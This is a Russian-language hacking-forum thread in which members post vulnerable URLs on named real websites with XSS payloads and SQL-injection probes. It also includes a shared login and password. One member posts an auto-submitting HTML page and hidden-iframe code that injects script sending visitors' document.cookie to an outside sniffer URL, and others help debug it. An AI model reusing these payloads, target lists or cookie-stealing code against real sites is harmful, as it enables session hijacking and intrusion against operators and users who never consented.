Бажные сайты от k1b0rg'a

пока нашол раскрытие пути, щас еще поищу
Warning: Cannot modify header information - headers already sent by (output started at /var/www/hackthissite.org/html/includes/layout/header.php:12) in /var/www/hackthissite.org/html/pages/articles/read_article.php on line 21
You are not logged in! Redirection to: http://www.illgotten.net/view/390.phpIf you wish to view this article with added HTS functionality, please register/login in

 

Это не бага, это ошибка которая говорит, что ты не зареган не залогинен.

Найдешь мне багу на этом сайте, буду у тебя в долгу. Это касается всех. Кто найдет багу на этом сайте, у того Белый Джордан будет официально в долгу.



Логин и пассворд для желающих.


zaq123qwerty:12345

 

http://megafon.buongiorno.com/megafon/web/russian/index.html где просят номер телефона (+7....)Можно вводить любой код
http://www.tefal.ru/tefal/magazine/recipe_results.asp?keyword=">%3Cscript%3Ealert%28%29%3C%2Fscript%3E&selectName=&APPLIANCE=&SPECIAL_DIETS=&x=0&y=0
http://lafox.net/shop/?gid=73'"><script>alert()</script>
http://www.hacktivist.net/anarchy/index.php?action=search'
http://www.sexonly.ru/katalog.php?ganr=20'
http://www.icq.com/icqchat/browse_folder.php?tid=30279";//--></script><script>alert()</script>
http://www.download.com/3120-20_4-0.html?tag=srch&nid=1&qt=666&tg=dl-2001"><script>alert()</script>
http://www.osmarket.ru/products/5'
http://zubov.net/666"%20style=background:url(javascript:alert());".cfm?nft=1&t=5&p=1
http://drocher.ru/goods_list.php?rubric_id=14"><script>alert()</script>

 

http://hosting.mail.ru/WhoisService.jsp?domain=<img%20style="background:url(vbscript:confirm())"> IE

 

-------------------------------------------------------------------
Вот прочитал статью и сделал всё как тама :

HTML:

<html>
<body onload="document.forms['snif'].submit()">
<form name="snif" action="http://www.mix.az/engine/modules/imagepreview.php?image=');">
<input type="text" name="word" value="<script>img = new Image(); 

img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>">
</form>

---------------------------------------------------------------------
Сохранил всё на ХТМЛ, и поместил у себя на сайте,открыл эту страничку , алерт не кидает, и на лог снифера нечего не идёт , почему , что я так не делаю под правь меня?

 

http://www.npj.ru/in/dura-lex-group/by/pvp/42564"%20style=background:url(javascript:alert());"

http://www.uinc.ru/news/sendnews.php
тема:" style=background:url(javascript:alert(1));"
Сообщение:</textarea><script>alert(2)</script>
Ваше имя:" style=background:url(javascript:alert(3));"
Ваш E-mail:" style=background:url(javascript:alert(4));"
Введите код, указанный на картинке: НЕ ввожим, жмем отправить получаем alert
может быть это и активная xss, хз я не проверял.

p.s. Tem
в скрытом фрейме можешь просто написать
<script>img = new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
а не видно, наверное потому он и скрытый

 

Так или я рехнулся, или уже спать хочется, и я перестал сооброжать, а где этот скрытый фрейм. ((

Или мне проста надо создать фрейм ?

 

Замени весь файл на
<iframe widht=0 height=0 frameborder=0 src=http:/// ></iframe>
да и все дела

 

это я знаю но опять фигня какаята, посмотрите сами

http://milliondollarhome-page.net/sniff.htm

 

<AD- me замени на <iframe
<AD- ame>замени на </iframe>
почитай про фреймы.Возьми какой нить учебник и прочти, там немного читать, зато сразу разберешься что к чему

 

хха -) отключи свою банерорезку -) у меня из-за Outpost'а такая же хрень.

 

Я про фреймы читал и знаю, но как эксплотировать нет, и у меня сейчас на часах 2 ночи, както не охота читать, вот мой код.

HTML:

<html>
<iframe widht=0 height=0 frameborder=0 src=http://www.mix.az/engine/modules/imagepreview.php?image=');</script><script>img = new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
</iframe>
</html>

Замени его по своему если не трудно, ото я три дня над этим сижу.

 

http://antichat.ru/cgi-bin/s.jpg?
вопрос должен в конце стоять.а так вроде все прально.
у тебя должно три страницы
1-главная(в ней тока коды размещения фреймов)
2-Тело, то что будет видеть чел когда зайдет на твой сайт.
3-скрытый фрейм(тот что ты написал вверху)
если у тебя ничо не получиться, я те завтра отпишу готовый пример.

блин точна, я и забыл что велел ему все блокировать, апплеты, флеш, скрытые фреймы, и т.д.

 

k1b0rg попробуй найти xcc на www.wwc.ru

 

http://www.footbolka.ru/catalog/index.php?ref=xren'
http://www.whoistar.com/content/view/55/1'/
http://narod.yandex.ru/userforum/message.xhtml?owner=[название_форума_жертвы]&message_id=3042605&thread_id=0&nickname=&email=&vari=2<script>alert()</script>
http://www.allpravo.ru/?id=88&type=0&query='"
http://www.classis.ru/cgi-bin/links...view=%C4%EE%E1%E0%E2%E8%F2%FC+%EE%F2%E7%FB%E2
http://www.refer.ru/menu?a=select_add&id="><script>alert()</script>
http://test.msk.ru/cgi-bin/searchdiplom2.cgi?words=<script>alert()</script>

2porter http://wwc.ru/index.php?do=search&ss="><script>alert()</script>

 

http://pointblanksecurity.com/xss/xss2.php

 

http://www.mtve.com/index.php?Page=2"><script>alert()</script>
http://register.logitech.com/index.cfm?validate=1";</script><script>alert()</script>
http://www.w3.org/Search/Mail/Publi...type=t&type-index="><script>alert(2)</script>
http://serial.com/?show=<script>alert()</script>&submit=Search
http://www.phpbuilder.com/snippet/browse.php?by=cat&cat=1"style=background:url(javascript:alert());"
http://poisk.ru/#"><script>alert()</script>
http://an.aport.ru/scripts/template.dll?That=ref&r="><script>alert()</script>&Base=referat&Rt=2
http://www.sexvideogid.ru/search.php?q="><script>alert()</script>
http://www.ag.ru/cheats/baldurs_gate_2_throne_of_bhaal/15170"><script>alert()</script>
http://catalog.aport.ru/rus/themes.aspx?id=1778'"><xz>
http://multifon.ru/stm/stm_popup.php?pid=54&type=jpg&name=666&url="style=background:url(javascript:alert());"
http://www.chestertonholdings.com/inquiry_handler.php отсутствует проверка полей
http://www.iceberg.ru/services/?id=23'&parent=0

 

http://www.scriptsearch.com/cgi-bin/report.cgi?999=delete&ID=%3Cscript%3Ealert('XSS')%3C/script%3E

 

http://1ps.ru/pr/ отсутствует проверка полей
http://seminar.spylog.ru/?rp=seminars/descr/15/ отсутствует проверка полей
http://members.yadro.ru/banners/nowstate.php3?vbn_id=-1'
http://hw.ru/hi-tech/Login.jsp?login='"><script>alert(1)</script>&password='"><script>alert(2)</script>
http://www.srb.ru/search-results/?q="><script>alert()</script>&m=all&wm=wrd&ps=10&page=0
http://www.profits.ru/login.php?w=user&o=login&e=u'
http://www.gf.ru/cgi-bin/podftp.cgi?hostname=<script>alert()</script>
http://www.zerkalo.com/cgi-bin/mail/adduser.cgi вводим в дополнительно->наши новости:Разные словосочетания допустим '"><script>!! в поля email и имя, и получаем на выходе http://www.zerkalo.com/cgi-bin/mail/adduser.cgi со строкой/home/ztu22/dead.letter... Saved message in /home/ztu22/dead.letter
http://smchat.ru/?s=reguser&login="><script>alert()</script>
http://www.film.ru/search.asp?what=...(javascript:alert());"&where=root&mode=medium

 

http://forum.utro.ru/newuser.php?Cat=<script>alert('xss')</script>
жмём "далее" - три xss